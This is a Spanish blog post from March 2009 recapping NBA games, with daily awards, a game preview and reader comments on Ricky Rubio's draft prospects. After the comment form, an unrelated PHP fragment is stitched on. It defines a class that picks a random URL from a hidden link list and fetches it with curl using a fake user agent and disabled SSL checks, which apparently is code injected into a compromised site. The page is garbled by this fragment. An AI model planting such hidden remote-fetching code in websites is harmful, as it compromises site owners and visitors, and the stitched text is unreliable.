La Crónica (21/03/2009)

22 de March de 2009 por Jabho

La noche de ayer nos deja las victorias mas o menos cómodas de los aspirantes al anillo y el descanso que se tomaron los equipos del Este en la carrera por el 8º puesto.

Ya comentábamos ayer que los Cavs debían dejarle claro a los Hawks quién mandaba. Lo hicieron y desde el primer momento. En sus casa los Cavs son casi inexpugnables y eso que los de Atlanta venían finos… El gran Ilgauskas superó los 10.000 puntos y ahora sólo le falta coronar una gran carrera con un anillo.

En el segundo partido de la jornada los Lakers ganaron a los Bulls en el primer partido de la gira de 7 que van a a hacer por el Este. Esta vez fueron ellos los que levantaron una desventaja de 14 puntos en el tercer cuarto y remataron en el arranque del cuarto con Kobe y Gasol viéndolo desde el banco. Buen partido de ambos y Gasol clavando las medias que comentábamos ayer.

Más de candidatos al anillo. Los Celtics vencieron con mucha comodidad, y minutos para todos, a los Grizzlies. Vienen bien estos partidos para recuperar a Garnett e ir dando entrada a los Marbury y Moore. Igualmente los Magic, el último de los aspirantes que jugaba anoche, vencieron a unos Knicks que jugaron sin David Lee.

En el resto de partidos, como hemos dicho, los vencedores fueron los que no jugaron en la lucha por los Play Offs del Este. Charlotte, contra todo pronóstico, perdió en casa frente Indiana. Mal momento este de los Bobcats para despistarse y los Pacers, muy irregulares este año, ayer nos dejaron la de cal. Los Bucks por su parte perdieron ante los Blazers con un buen Rudy y un Sergio que jugó unos minutos, que ya es algo.

Cerramos la jornada con la victoria de los Suns contra los Wizards. Shaquille O´Neal es ya el 5º anotador de la historia de la NBA superando a Moses Malone y además le dejó claro a King James que él es el rey de los showman. A la fotito de los Cavs respondió O´Neal con una escenita de bolos….

PREMIOS

MVP: Anoche buenas actuaciones de Richardson o el duo Kobe&Gasol. Pero el premio va para Brandon Roy que unió a sus 30 puntos, 8 rebotes y 7 asistencias.

Rookie: Derrick Rose fue el mejor de los que jugaron anoche donde también cuajaron buenos partidos Rush, Lee, McGee y Rudy.

Sorpresa: Pues dos candidatos para el premio hoy. Se queda cerca Glen Davis que fue el máximo anotador en la victoria de los Celtics con 24 puntos y 5 rebotes con buenos porcentajes. El premio para Jarrett Jack con sus curiosas estadísticas jugando de base: 31 puntos, 6 rebotes y sólo 2 asistencias. Ah, y 13 de 14 en tiro, tremendo.

Decepción: Los Bobcats perdieron una oportunidad de oro en un mal partido que podemos personalizar en el rookie DJ Augustine y en Gerald Wallace.

El mayor esfuerzo en vano: Ayer para Salmons y sus 30 puntos contra los Lakers y para Richardson que junto con Robinson fueron los mejores en la derrota de los Knicks.

RAZONES PARA TRASNOCHAR

Pues no es una gran jornada para ser domingo pero si tenemos un partido muy interesante para llevarnos a la boca:

Rockets@Spurs: Se enfrentan 2º y 3º de una conferencia Oeste que está ajustadísima. Dando por supuesto las victorias ante rivales asequibles, la clasificación final depende de estos duelos sin contar que además podría ser enfrentamiento de Play Offs. ¿Reaparecerá Manu? Duncan y Ming frente a frente… y Bowen contra Artest.

El jugador a  seguir es… Kevin Martin. No acaba de jugar temporadas completas y además los Kings no luchan por nada que no sea más papeletas para el draft. Pero anda fino los últimos partidos y seguro que con ganas de reivindicarse.

LA PREGUNTA DEL DÍA

Con la locura de Marzo de fondo ya se ha confirmado que Ricky Rubio se presentará al draft. Al menos se inscribirá sabiendo que unos 10 días antes de la elección puede, si quiere, retirarse. Al parecer un top-3 le convencería para irse y pagar su claúsula. Es muy pronto pero equipos como Sacramento han mostrado interés y si son últimos, como hasta ahora, tienen garantizado un pick 4 como máximo. Muchas preguntas. La fácil ¿le conviene esperar un año más (versión 2 de Sergio Rodriguez) ?¿Será top 3 (es un año con mucho jugador exterior)? ¿Qué equipo le conviene?….

Comenta

7 comentarios a esta entrada

  1. Jabho dice:
    #1

    Me respondo a mi mismo. Creo que Ricky lo está haciendo bien. Si tiene un buen pick debe irse porque más allás del dinero eso le garantiza respeto y minutos. ¿Va a ser top 3? Yo creo que si, seguro. No soy un gran especialista de NCAA pero por lo que he visto no hay ningún base mejor en el draft… Vamos, debería ser pick 1 o 2.

    Una elección alta casi le garantiza que le pase lo que ha Sergio, además de que es mejor jugador.

    Equipos si sale elegido alto vale casi cualquiera aunque Memphis o Clippers por distintos motivos no pintan bien. Sacramento, Wizards o incluso Thunder podrían ser buenos equipos…aunque es pronto y muchos de estos equipos tienen proyectos muy poco definidos, sin entrandores estables.

      Citar

  2. sabas dice:
    #2

    A mi me gustaria que se quedara un par de años en Europa. Pero creo que la situacion es propicia para irse, de todas formas como puede retirarse de draf es bueno sondear el mercado a ver que equipos estan interesados en el y que le ofrecen. No va a ser otro caso como el de Sergio, una posicion alta te asegura minutos y calidad tiene de sobra para aprovercharlos, además yo creo que no esta tan verde como estaba Sergio cuando se fue.

      Citar

  3. Viva_Dirk dice:
    #3

    Creo que lo ideal sería que esperara un año mas, pero desde luego salvo que tenga muy mala suerte con la colocación de los equipos será top-2. Los únicos que ahora mismo luchan por el Nº1 y no lo elegirian serían Clippers y Wizars(si siguen confiando en la vuelta de Arenas). Supongo que si se acaba presentando será Nº2 salvo que caigan esos 2 equipos, y me crea dudas que los Thunder hallan hecho jugar como base a Westbrook, desde luego una pareja exterior Ricky-Westbrook es una pesadilla para cualquier ataque y ambos mejorarán su tiro exterior.

    No sería mala opción Memphis, si se centran claro. Si realmente le dan galones a Ricky es el tipo de base que les hace falta.

    El sitio perfecto para el ahora mismo me parecen los Kings, con una estrella consagrada que le quita responsabilidad y luego mucho joven a quien dirigir.

      Citar

  4. Miguel dice:
    #4

    Creo que caerá seguramente el 2-3, donde mejor estaría creo que es en Washington con un quinteto para el año que viene con Haywood-Jamison-Butler-Arenas-Rubio estarían seguro entre los 8 mejores del Este.
    LA estaría bien aunque no le veo quitandole el sitio a Baron y/o a Gordon.
    Oklahoma tampoco estaría mal con un equipo joven y que no da muchos problemas en el vestuario, acompañado de Durant, Green y Westbrook aprenderá pronto.
    Sacramento para mi sería una mala opción, los veo sin rumbo ahora mismo y Memphis lo mismo, Ricky es mucho mejor que Gay y Mayo pero no le veo quitandole muchos tiros de esos 15 que promedian cada uno por partido.

      Citar

  5. javi dice:
    #5

    Yo tengo claro que estará en el top 3 seguro. Luego lo de los equipos, pues ahi influirán muchos factores. La que opcion mas interesante xa mi sería los Wizards con G-Arenas de 2 q creo q es dnde mejor juega, pro bueno hay demasiadas cosas q pueden hacer cambiar las cosas como x ejemplo un base q se salga en las finales de la NCCA.

    Sin embargo creo q NO DEBE IRSE sin mejorar el tiro, cosa q a dia de hoy no tiene ni de lejos. En la NBA ademas de ser un base asistete hay q anotar si no no t dan ni bola. Un año mas le serviria xa coger aun mas experiencia(es su principal ventaja frente a los universitarios) y sobre todo xa mejorar el tiro. Con sus cualidades y mejorando el tiro será un crack.

    Dejanos disfrutar un añito mas de ti Rykcy!!!!!!!!!!!!!!!!!!

      Citar

  6. Txusma dice:
    #6

    Para lo poquito q he podido ver de NCCA, Ricky es mejor q cualquiera de los q juegan alli, quitando a Blake Griffin por supuesto. Otra cosa es q los de la NBA quieran verlo.
    Otro dato importante es q en breve toca negociacion del convenio colectivo y viendo como esta el tema de la crisis lo mas probable es q los salarios bajen. Este verano va a estar curioso con todos los jugadores buscando contratos largos y las franquicias buscandolos cortos.

      Citar

  7. TheDeerHunter dice:
    #7

    Estoy de acuerdo…
    lo ideal sería otro año más aquí pero si le aseguran un top3 y no se va estaría loco.

    Después… de su destino ideal y demás si no fuera porque Memphis es una franquicia sin ningún tipo de ambición diría que podría ser un gran destino: tiene a Marc, a Mayo y Gay lo que les hace falta es un buen base que les dirija, todos son jovenes y tienen margen salarial para apañar un buen juego interior el año que viene.

    Después, el resto me hace la gracia justita…. a priori el mejor destino sería Washington, por aquello de ser un equipo con ambición y aspiraciones y que puede adaptar la posición de Arenas según necesidades.
    Sacramente me gusta bastante… pero tampoco sé muy bien por donde pueden salir.
    Los Thunder no están mal para empezar de cero…

    El peor destino los Clippers, porque lo tendría muy difícil.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>